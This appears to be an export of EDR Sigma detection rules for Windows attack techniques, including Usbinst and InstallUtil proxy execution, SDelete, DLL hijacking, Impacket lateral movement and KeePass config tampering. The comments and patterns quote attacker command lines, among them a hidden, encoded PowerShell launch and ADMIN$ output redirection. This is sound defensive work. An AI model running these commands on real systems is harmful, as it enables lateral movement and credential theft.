classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # By default C:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers64\\Usbinst.exe\n - OriginalFileName: 'USBINST.EXE'\n - Image|endswith: '\\usbinst.exe'\n\n selection_arg:\n CommandLine|contains|all:\n - ' InstallHinfSection'\n - 'DefaultInstall'\n\n exclusion_citrix:\n - Image|endswith:\n - '\\Drivers64\\usbinst.exe'\n - '\\Devices64\\usbinst.exe'\n Signed: 'true'\n Signature: 'Citrix Systems, Inc.'\n - CommandLine|contains:\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Receiver\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\AppDataProtection\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files (x86)\\Citrix\\AppDataProtection\\Drivers64\\ctxusbm\\ctxusbmon.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers64\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Drivers32\\ctxusbm\\ctxusbm.inf'\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\Devices64\\ctxusbm\\ctxusbmon.inf'\n\n condition: selection and selection_arg and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "106504ea-01dd-41ce-a381-3e8f27c77ff0", "rule_name": "Proxy Execution via Usbinst", "rule_description": "Detects a suspicious execution of Citrix Usbinst.exe to proxy execution of malicious code.\nThis binary, which is signed by Citrix, can be used to start malicious binaries whose inf file is passed as a parameter to usbinst.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to use a \"File download\" job to donwload and analyze the .inf file present in the command-line for malicious content.\n", "rule_creation_date": "2022-12-04", "rule_modified_date": "2025-11-04", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1218" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "108163b7-c707-4764-bf00-b43b3ae7e56d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.080094Z", "creation_date": "2026-03-23T11:45:34.080096Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.080100Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/cobbr/Covenant", "https://attack.mitre.org/techniques/T1218/004/", "https://attack.mitre.org/techniques/T1071/001/" ], "name": "t1218_004_installutil_suspicious_network_communication.yml", "content": "title: Suspicious InstallUtil.exe Network Communication\nid: 108163b7-c707-4764-bf00-b43b3ae7e56d\ndescription: |\n Detects a suspicious network communication from InstallUtil.exe.\n Attackers have used InstallUtil in the past to execute a malicious Beacon stager. It is commonly used for the Covenant Framework InstallUtil launcher.\n Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\n It is recommended to investigate all InstallUtil.exe network connections, correlate with process execution logs and .NET assembly loads, and terminate any suspicious communications.\nreferences:\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1218/004/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2021/11/10\nmodified: 2025/05/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.004\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Framework.Covenant\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n - Image|endswith: '\\InstallUtil.exe'\n - ProcessOriginalFileName: 'InstallUtil.exe'\n\n exclusion_localhost:\n DestinationIp:\n - '127.0.0.1'\n - '::1'\n\n exclusion_programfiles:\n ProcessCommandLine|contains:\n - '\\InstallUtil.exe *:\\Program Files\\'\n - '\\InstallUtil.exe *:\\Program Files (x86)\\'\n\n exclusion_archimed:\n - ProcessParentImage: '?:\\Program Files (x86)\\Archimed\\Elise\\EliseInstallUninstall.exe'\n - ProcessParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\Program Files (x86)\\Common Files\\Archimed\\Crystal Framework v4\\\\*'\n - ProcessCurrentDirectory:\n - '?:\\Program Files (x86)\\Common Files\\Archimed\\Crystal Framework v4'\n - '?:\\Program Files (x86)\\Common Files\\Archimed\\Crystal Framework v4\\'\n\n exclusion_devexpress:\n ProcessParentImage|endswith: '\\DevExpressComponents-*.exe'\n ProcessCommandLine|contains|all:\n - ' /LogFile='\n - ' /DemosDir='\n - ' /DemosName=Components '\n - '\\Components\\System\\Components\\DevExpress.DemosUpdater.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "108163b7-c707-4764-bf00-b43b3ae7e56d", "rule_name": "Suspicious InstallUtil.exe Network Communication", "rule_description": "Detects a suspicious network communication from InstallUtil.exe.\nAttackers have used InstallUtil in the past to execute a malicious Beacon stager. It is commonly used for the Covenant Framework InstallUtil launcher.\nCovenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\nIt is recommended to investigate all InstallUtil.exe network connections, correlate with process execution logs and .NET assembly loads, and terminate any suspicious communications.\n", "rule_creation_date": "2021-11-10", "rule_modified_date": "2025-05-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1071", "attack.t1218.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "108c4c3b-fe29-4e66-8036-5c56b0423fcb", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.087529Z", "creation_date": "2026-03-23T11:45:34.087532Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.087539Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx", "https://attack.mitre.org/techniques/T1070/004/", "https://attack.mitre.org/software/S0195/" ], "name": "t1070_004_sdelete.yml", "content": "title: SDelete Tool Execution\nid: 108c4c3b-fe29-4e66-8036-5c56b0423fcb\ndescription: |\n Detects the execution of SDelete tool, an application that securely deletes data in a way that makes it unrecoverable.\n This tool is part of the Microsoft Sysinternals suite tools and is often used by attackers to removal files behind their malicious activities.\n It is recommended to analyze both the parent process and the deleted files to determine whether this action has legitimate intent.\nreferences:\n - https://technet.microsoft.com/en-us/en-en/sysinternals/sdelete.aspx\n - https://attack.mitre.org/techniques/T1070/004/\n - https://attack.mitre.org/software/S0195/\ndate: 2021/06/18\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - attack.t1485\n - attack.s0195\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.SDelete\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith:\n - '\\sdelete.exe'\n - '\\sdelete64.exe'\n OriginalFileName: 'sdelete.exe'\n\n exclusion_image:\n Image:\n - '?:\\ProgramData\\chocolatey\\bin\\sdelete.exe'\n - '?:\\Program Files (x86)\\Skidata\\ParkingSW\\\\*\\Tools\\sdelete.exe'\n\n exclusion_generic_scripts_folder:\n ProcessGrandparentCommandLine|startswith: 'cscript.exe \\\\\\\\*\\\\*$\\Scripts\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "108c4c3b-fe29-4e66-8036-5c56b0423fcb", "rule_name": "SDelete Tool Execution", "rule_description": "Detects the execution of SDelete tool, an application that securely deletes data in a way that makes it unrecoverable.\nThis tool is part of the Microsoft Sysinternals suite tools and is often used by attackers to removal files behind their malicious activities.\nIt is recommended to analyze both the parent process and the deleted files to determine whether this action has legitimate intent.\n", "rule_creation_date": "2021-06-18", "rule_modified_date": "2025-11-17", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1070.004", "attack.t1485" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "10a3eb4c-d254-488d-843c-5e77fb2f6b4c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.075752Z", "creation_date": "2026-03-23T11:45:34.075754Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.075759Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_drvinst.yml", "content": "title: DLL Hijacking via drvinst.exe\nid: 10a3eb4c-d254-488d-843c-5e77fb2f6b4c\ndescription: |\n Detects potential Windows DLL Hijacking via drvinst.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'drvinst.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\DEVRTL.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "10a3eb4c-d254-488d-843c-5e77fb2f6b4c", "rule_name": "DLL Hijacking via drvinst.exe", "rule_description": "Detects potential Windows DLL Hijacking via drvinst.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "10c14723-61c7-4c75-92ca-9af245723ad2", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.628613Z", "creation_date": "2026-03-23T11:45:34.628615Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.628619Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py", "https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py", "https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py", "https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py", "https://attack.mitre.org/software/S0357/" ], "name": "t1047_impacket_lateral_movement.yml", "content": "title: Impacket Lateral Movement Detected\nid: 10c14723-61c7-4c75-92ca-9af245723ad2\ndescription: |\n Detects wmiexec/dcomexec/atexec/smbexec from the Impacket framework.\n Impacket is a collection of Python classes for working with network protocols.\n Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.\n It is often used by threat actors to perform lateral movements.\n It is recommended investigate the process tree for suspicious activities.\n Is is also recommended to investigate the network type authentications at the same time in order to get the IP address of the computer from which the lateral movement comes from.\nreferences:\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py\n - https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py\n - https://attack.mitre.org/software/S0357/\ndate: 2019/09/03\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.lateral_movement\n - attack.t1021.002\n - attack.t1021.003\n - attack.s0357\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Impacket\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_other:\n # *** wmiexec.py\n # parent is wmiprvse.exe\n # examples:\n # cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1567439113.54 2>&1\n # cmd.exe /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1567439113.54 2>&1\n # *** dcomexec.py -object MMC20\n # parent is mmc.exe\n # example:\n # \"C:\\Windows\\System32\\cmd.exe\" /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1567442499.05 2>&1\n # *** dcomexec.py -object ShellBrowserWindow\n # runs %SystemRoot%\\System32\\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe\n # example:\n # \"C:\\Windows\\System32\\cmd.exe\" /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1567520103.71 2>&1\n # *** smbexec.py\n # parent is services.exe\n # example:\n # C:\\Windows\\system32\\cmd.exe /Q /c echo tasklist ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > C:\\Windows\\TEMP\\execute.bat & C:\\Windows\\system32\\cmd.exe /Q /c C:\\Windows\\TEMP\\execute.bat & del C:\\Windows\\TEMP\\execute.bat\n # C:\\Windows\\system32\\cmd.exe /Q /c powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAdwBoAG8AYQBtAGkA 1> \\\\127.0.0.1\\ADMIN$\\__1615559515.6162736 2>&1\n ParentImage|endswith:\n - '\\wmiprvse.exe' # wmiexec\n - '\\mmc.exe' # dcomexec MMC\n - '\\explorer.exe' # dcomexec ShellBrowserWindow\n - '\\services.exe' # smbexec\n CommandLine:\n # wmiexec.py and dcomexec.py\n - '*cmd.exe* /Q /c * 1> \\\\\\\\127.0.0.1\\\\* 2>&1'\n # smbexec.py\n - '*cmd.exe* /Q /c * ^> \\\\\\\\127.0.0.1\\\\* 2^>^&1 > *'\n - '*powershell.exe* -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsA*'\n\n selection_atexec:\n ParentCommandLine|contains:\n - 'svchost.exe -k netsvcs' # atexec on win10 (parent can be \"C:\\Windows\\system32\\svchost.exe -k netsvcs\" or \"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule\")\n - 'taskeng.exe' # atexec on win7 (parent is \"taskeng.exe {AFA79333-694C-4BEE-910E-E57D9A3518F6} S-1-5-18:NT AUTHORITY\\System:Service:\")\n # cmd.exe /C tasklist /m > C:\\Windows\\Temp\\bAJrYQtL.tmp 2>&1\n CommandLine: 'cmd.exe /C *Windows\\\\Temp\\\\*&1'\n\n condition: 1 of selection_*\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "10c14723-61c7-4c75-92ca-9af245723ad2", "rule_name": "Impacket Lateral Movement Detected", "rule_description": "Detects wmiexec/dcomexec/atexec/smbexec from the Impacket framework.\nImpacket is a collection of Python classes for working with network protocols.\nImpacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself.\nIt is often used by threat actors to perform lateral movements.\nIt is recommended investigate the process tree for suspicious activities.\nIs is also recommended to investigate the network type authentications at the same time in order to get the IP address of the computer from which the lateral movement comes from.\n", "rule_creation_date": "2019-09-03", "rule_modified_date": "2026-02-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.execution", "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1021.002", "attack.t1021.003", "attack.t1047" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "10c34848-23dc-4d3c-a8e7-187197b79a2d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.621563Z", "creation_date": "2026-03-23T11:45:34.621565Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.621569Z", "rule_level": "high", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://blog.slowerzs.net/posts/thievingfox/", "https://attack.mitre.org/techniques/T1555/005/" ], "name": "t1555_005_keepass_executable_config_write.yml", "content": "title: KeePass Executable Configuration Modified by an External Tool\nid: 10c34848-23dc-4d3c-a8e7-187197b79a2d\ndescription: |\n Detects a modification of the KeePass.exe.config file that could lead to credential theft.\n Attackers may modify KeePass' configuration file which defines the behavior of the .NET runtime by switching native function pointers by malicious ones in order to dump the password database.\n It is recommended to check the file content for any added lines that could indicate a compromise.\nreferences:\n - https://blog.slowerzs.net/posts/thievingfox/\n - https://attack.mitre.org/techniques/T1555/005/\ndate: 2024/02/13\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.005\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: file_write\ndetection:\n selection:\n Path|endswith: '\\KeePass.exe.config'\n\n filter_keepass:\n ProcessOriginalFileName: 'KeePass.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Certum Code Signing 2021 CA'\n - 'Open Source Developer, Dominik Reichl'\n\n exclusion_sysytem:\n ProcessName: 'system'\n ProcessId: '4'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\Program Files\\Microsoft Security Client\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_msiexec:\n ProcessImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\Syswow64\\msiexec.exe'\n\n exclusion_explorer:\n ProcessImage: '?:\\Windows\\explorer.exe'\n\n exclusion_vsssvc:\n ProcessImage: '?:\\Windows\\System32\\VSSVC.exe'\n\n exclusion_7z:\n ProcessImage|endswith:\n - '\\7z.exe'\n - '\\7zG.exe'\n - '\\7zM.exe'\n - '\\7zFM.exe'\n ProcessCompany: 'Igor Pavlov'\n ProcessDescription:\n - '7-Zip Console'\n - '7-Zip GUI'\n - '7-Zip File Manager'\n\n exclusion_winrar:\n ProcessOriginalFileName: 'WinRAR.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'win.rar GmbH'\n\n exclusion_mcafee:\n ProcessProcessName:\n - 'mfeesp.exe'\n - 'mcshield.exe'\n - 'mfefw.exe'\n - 'mfetp.exe'\n - 'VsTskMgr.exe'\n - 'Scan64.exe'\n - 'shstat.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n\n exclusion_dllhost:\n # Used when copy file from explorer when UAC is enabled\n ProcessImage: '?:\\Windows\\system32\\DllHost.exe'\n ProcessCommandLine: '?:\\Windows\\system32\\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}'\n\n exclusion_ivanti:\n ProcessParentImage: '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\sdistps1.exe'\n\n # File History Service\n exclusion_fhsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc'\n\n exclusion_robocopy:\n ProcessOriginalFileName: 'robocopy.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "10c34848-23dc-4d3c-a8e7-187197b79a2d", "rule_name": "KeePass Executable Configuration Modified by an External Tool", "rule_description": "Detects a modification of the KeePass.exe.config file that could lead to credential theft.\nAttackers may modify KeePass' configuration file which defines the behavior of the .NET runtime by switching native function pointers by malicious ones in order to dump the password database.\nIt is recommended to check the file content for any added lines that could indicate a compromise.\n", "rule_creation_date": "2024-02-13", "rule_modified_date": "2026-03-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1555.005" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "112484b0-ac5d-40a8-a775-0a918f1aa7f1", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.601524Z", "creation_date": "2026-03-23T11:45:34.601528Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.601536Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://twitter.com/an0n_r0/status/1544472352657915904", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_cscript.yml", "content": "title: DLL Hijacking via cscript.exe\nid: 112484b0-ac5d-40a8-a775-0a918f1aa7f1\ndescription: |\n Detects potential Windows DLL Hijacking via cscript.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cscript.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n 